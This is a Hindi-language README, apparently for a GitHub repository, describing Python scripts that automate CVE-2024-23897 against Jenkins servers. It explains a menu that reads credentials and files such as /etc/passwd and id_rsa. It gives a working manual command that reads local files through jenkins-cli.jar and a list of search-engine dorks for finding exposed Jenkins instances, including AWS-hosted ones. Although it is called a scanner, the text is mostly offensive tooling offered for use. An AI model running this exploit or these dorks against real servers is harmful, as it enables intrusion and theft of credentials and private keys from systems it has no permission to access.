
CVE-2024-23897 भेद्यता को स्वचालित करने के लिए python में बनाई गई एक स्क्रिप्ट।
प्रभावित संस्करण:
CVE-2024-23897 भेद्यता को स्वचालित करने के लिए पायथन में बनाई गई एक स्क्रिप्ट 🤖 🛠️
यह पायथन कोड Jenkins सर्वरों में एक विशिष्ट भेद्यता (CVE-2024-23897) के लिए एक स्कैनर प्रस्तुत करता है। यह उपयोगकर्ता से Jenkins सर्वर का URL मांगकर शुरू होता है।
फिर, यह कमांड लाइन से Jenkins के साथ इंटरैक्ट करने के लिए आवश्यक "jenkins-cli.jar" फ़ाइल डाउनलोड करने का विकल्प प्रदान करता है। इसके बाद, यह विकल्पों का एक मेनू प्रस्तुत करता है जिसमें सर्वर, पर्यावरण, Jenkins कॉन्फ़िगरेशन, उपयोगकर्ताओं, क्रेडेंशियल्स की जानकारी प्राप्त करने जैसे कमांड चलाना शामिल है, साथ ही "/etc/passwd", "/etc/os-release" और "id_rsa" जैसी संवेदनशील फ़ाइलों को पढ़ना भी शामिल है।
एक बार मेनू से एक विकल्प चुने जाने पर, प्रदान किए गए Jenkins सर्वर पर संबंधित कमांड निष्पादित किया जाता है। कोड फ़ाइल डाउनलोड करने और कमांड निष्पादित करने के लिए फ़ंक्शनों के साथ संरचित है, और प्रोग्राम के प्रवाह को संभालने के लिए एक मुख्य फ़ंक्शन है।
Jenkins सर्वर के लिए निष्पादन 📝:
python3 CVE-2024-23897-A-scaner.py
DOCKER में Jenkins सर्वर के लिए निष्पादन 📝:
python3 CVE-2024-23897-B-DOCKER-scaner.py
---------------------------------------------------------------------------------------------------------------------------------
मैन्युअल निष्पादन।
1- jenkins-cli.jar डाउनलोड करें: http:///jnlpJars/jenkins-cli.jar
2- LFI करने के लिए, निष्पादित करें: java -jar jenkins-cli.jar -s http://172.17.0.2:8080/ -http connect-node "@/etc/passwd"
डॉर्क सूची:
intitle:"Dashboard [Jenkins]" inurl:"/login"
intitle:"Jenkins" "Dashboard"
inurl:"/computer/" intitle:"Jenkins"
inurl:"/script" intitle:"Jenkins"
"Jenkins [Jenkins]" intitle:"Login"
intitle:"Jenkins" "Jenkins ver. 2.441"
inurl:"/manage" intitle:"Jenkins"
site:.com intitle:"Jenkins"
site:aws.amazon.com intitle:"Jenkins"
filetype:xml inurl:"jenkins/config.xml"